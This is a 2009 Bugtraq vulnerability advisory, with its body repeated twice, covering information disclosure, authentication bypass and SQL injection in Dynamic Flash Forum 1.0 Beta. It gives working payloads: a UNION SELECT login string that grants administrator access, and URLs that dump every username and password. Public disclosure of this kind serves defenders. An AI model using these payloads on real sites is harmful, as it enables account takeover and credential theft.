Dynamic Flash Forum 1.0 Beta Multiple Remote Vulnerabilities
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Dynamic Flash Forum 1.0 Beta Multiple Remote Vulnerabilities
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Thu, 9 Apr 2009 23:09:52 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=xtSTkYYgcyCjKAmbm91QX3B1ntTOOJ9rPlmBot7utuk=; b=wqSPBtofn3AKBYpPkfebWgAksdj0v/PZEuDMB4sti5sOgRfhYImE/QpT/3GDbrzNxc itUrDz85ptEAuzVWHgEEhDZ7N3tDwDut3YrIA1R0hZW9kYMcLtZxm91ZPYWctrGoUheJ 5KFBCfLZ8IUZMCZ0Wj/2s32IKRgJzzbX/Z/SU=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=c6QHO4y3KJywT15uofASAb42Myp9OrAhYS5pAdSyYFpC/pnGMlWMT/W/QJLemuWGuo 4hCzkKVwpPFSPkItsfYVU+UghX47GDAQvsrHI6BrW/VV7aJ9wkO275tQeKLS/gPh/m9f yFgwVG4Yr6GNE47vxRLkr+bPbkK+T3oCJPs5o=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: Dynamic Flash Forum
[+] Version: 1.0 Beta
[+] Website: http://df2.sourceforge.net/
[+] Bugs: [A] Information Disclosure
[B] Authentication Bypass
[C] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Information Disclosure
[-] File affected: config.inc
This file contains reserved informations such as
the username and the password for connecting to
the database. Using .inc extension only, the
content is visible.
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php
This bug allows a guest to bypass the authentication
system and to login with administrator privileges.
- [C] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewprofile.php, viewmessage.php,
viewthreads.php
This bug allows a guest to execute arbitrary
queries.
*************************************************
[+] Code
- [A] Information Disclosure
http://www.site.com/path/config.inc
- [B] Authentication Bypass
Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23
Password: password
- [C] Multiple SQL Injection
http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23
http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)),NULL,NULL,NULL FROM users%23
http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)) FROM users%23
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******
[+] Application: Dynamic Flash Forum
[+] Version: 1.0 Beta
[+] Website: http://df2.sourceforge.net/
[+] Bugs: [A] Information Disclosure
[B] Authentication Bypass
[C] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 09 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Information Disclosure
[-] File affected: config.inc
This file contains reserved informations such as
the username and the password for connecting to
the database. Using .inc extension only, the
content is visible.
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php
This bug allows a guest to bypass the authentication
system and to login with administrator privileges.
- [C] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewprofile.php, viewmessage.php,
viewthreads.php
This bug allows a guest to execute arbitrary
queries.
*************************************************
[+] Code
- [A] Information Disclosure
http://www.site.com/path/config.inc
- [B] Authentication Bypass
Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23
Password: password
- [C] Multiple SQL Injection
http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23
http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)),NULL,NULL,NULL FROM users%23
http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)) FROM users%23
*************************************************
[+] Fix
No fix.
*************************************************